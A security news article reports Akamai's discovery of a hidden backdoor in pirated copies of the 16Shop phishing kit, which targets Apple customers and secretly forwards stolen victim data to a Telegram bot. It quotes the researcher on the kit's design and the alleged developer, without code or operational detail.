Researchers have discovered a hidden backdoor in a commercial phishing kit, 16Shop, used to attack Apple customers, according to Akamai.
“When it comes to targeting Apple users and their personal and financial data, 16Shop has emerged as a go to kit for those who can afford it. While 16Shop is sold to criminals looking to collect sensitive information from a targeted subset of the Internet community, at least one pirated version circulating online houses a backdoor that siphons off the data harvested and delivers it to a Telegram channel – proving once more that there is no honor among thieves," wrote Akamai researcher Amiram Cohen.
According to the research, this highly sophisticated and neatly constructed kit has layered defenses, as well as attack mechanisms. “It's a true multi-level kit, running different stages for different brands, depending on the information the victim provides. It has the ability to change its layout and presentation depending on platform, so mobile users will see a website tailored to their device, while desktop users see something better suited to their situation,” wrote Cohen.
The phishing kit was allegedly developed by an Indonesian whom Cohen said “has the skill to be a legitimate security community member, as well as the skills to maintain a healthy career in development. Instead, and most unfortunately, their knowledge is applied to a criminal enterprise.”
Until now, the individual has been known only as either devilscream or Riswanda. In addition to Cohen multiple online researchers “have located various personal artifacts of Riswanda's, including GitHub repositories, security presentations, past examples of website defacements, pictures of family and friends, email address, and social media accounts.”
However, some users of the phishing kit have been sharing their criminally obtained information without their knowledge through a backdoor that makes a copy of the victim's information and secrets it over to a bot waiting in a room on Telegram, according to Cohen.
“Akamai first discovered this backdoor while examining code inside of main.php, which was obfuscated in a way that made it stand out. The highly obfuscated code collects information for all of the forms visited by the victim, and no matter what storage and delivery options are selected by the 16Shop operator, the victim's data is siphoned off and sent to the Telegram bot via API calls,” Cohen said.
The author reportedly has released video demonstrations showing active usage of Telegram as a means of data storage. “However, like other popular phishing kits, 16Shop has been pirated. Based on comparisons against multiple versions of the 16Shop, the backdoor only appears in the de-obfuscated version of the kit,” Cohen said.